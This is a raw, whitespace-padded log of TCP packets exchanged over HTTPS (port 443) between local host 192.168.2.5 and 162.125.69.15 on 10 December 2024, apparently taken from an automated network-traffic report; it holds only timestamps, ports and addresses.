                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.135303020 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.142749071 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.142779112 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.142847061 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.142853975 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.142900944 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.150233984 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.150263071 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.150322914 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.150331020 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.150394917 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.150407076 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.150773048 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.157754898 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.157787085 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.157825947 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.157830954 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.157897949 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.164761066 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.164777994 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.164841890 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.164849043 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.164896011 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.167987108 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.172568083 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.172591925 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.172684908 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.172691107 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.172740936 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.179807901 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.179824114 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.179883003 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.179888964 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.179932117 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.192316055 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.320883036 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.320909023 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.320951939 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.320959091 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.320992947 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.321013927 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.328172922 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.328195095 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.328265905 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.328273058 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.328370094 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.335722923 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.335741043 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.335791111 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.335798025 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.335844994 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.342307091 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.342324018 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.342370987 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.342376947 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.342428923 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.342478991 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.349973917 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.349991083 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.350059986 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.350066900 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.350085974 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.350112915 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.357042074 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.357060909 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.357096910 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.357104063 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.357120037 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.357141972 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.364366055 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.364402056 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.364424944 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.364430904 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.364464045 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.364486933 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.371973991 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.371993065 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.372035980 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.372041941 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.372076988 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.372098923 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.375910997 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.513956070 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.513983011 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.514065981 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.514101028 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.514147997 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.520497084 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.520519018 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.520559072 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.520569086 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.520618916 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.528023005 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.528040886 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.528106928 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.528112888 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.528156996 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.535605907 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.535624027 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.535693884 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.535721064 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.535775900 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.542340040 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.542357922 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.542418003 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.542427063 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.542470932 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.542489052 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.550378084 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.550396919 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.550458908 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.550466061 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.550517082 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.556694031 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.556711912 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.556761980 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.556794882 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.556813002 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.556866884 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.564150095 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.564167976 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.564209938 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.564222097 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.564249992 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.564270020 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.705357075 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.705389977 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.705452919 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.705485106 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.705501080 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.705532074 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.712865114 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.712899923 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.712930918 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.712939024 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.712969065 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.712991953 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.720392942 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.720412016 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.720467091 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.720473051 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.720535040 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.727029085 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.727046013 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.727113962 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.727123022 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.727174044 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.734560966 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.734580040 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.734636068 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.734642029 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.734710932 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.741633892 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.741652012 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.741719961 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.741725922 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.741766930 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.749048948 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.749088049 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.749111891 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.749118090 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.749161005 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.749185085 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.756678104 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.756700039 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.756738901 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.756745100 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.756784916 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.898957014 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.898998022 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.899079084 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.899090052 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.899141073 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.904917955 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.904962063 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.904993057 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.904999018 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.905034065 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.911529064 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.911549091 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.911623955 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.911629915 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.911725044 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.919111967 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.919135094 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.919179916 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.919184923 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.919209957 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.919231892 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.926549911 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.926570892 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.926668882 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.926675081 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.926717997 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.933727026 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.933747053 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.933804989 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.933813095 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.933854103 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.941157103 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.941179991 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.941245079 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.941250086 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.941287994 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.947818041 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.947841883 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.947871923 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.947879076 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.947913885 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:40.947936058 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.089936972 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.089965105 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.090035915 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.090064049 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.090118885 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.098265886 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.098288059 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.098356962 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.098370075 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.098392010 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.098413944 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.105201960 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.105221987 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.105287075 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.105293036 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.105335951 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.111865997 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.111882925 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.111934900 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.111943007 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.112008095 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.118653059 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.118669987 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.118737936 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.118762970 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.118906021 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.125633955 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.125654936 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.125694990 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.125704050 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.125725985 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.125741959 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.133207083 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.133224010 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.133282900 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.133291006 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.133347034 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.140702963 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.140719891 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.140765905 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.140770912 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.140820026 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.140832901 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.145241976 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.282337904 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.282362938 CET44349811162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.282433987 CET49811443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:41.282453060 CET44349811162.125.69.15192.168.2.5
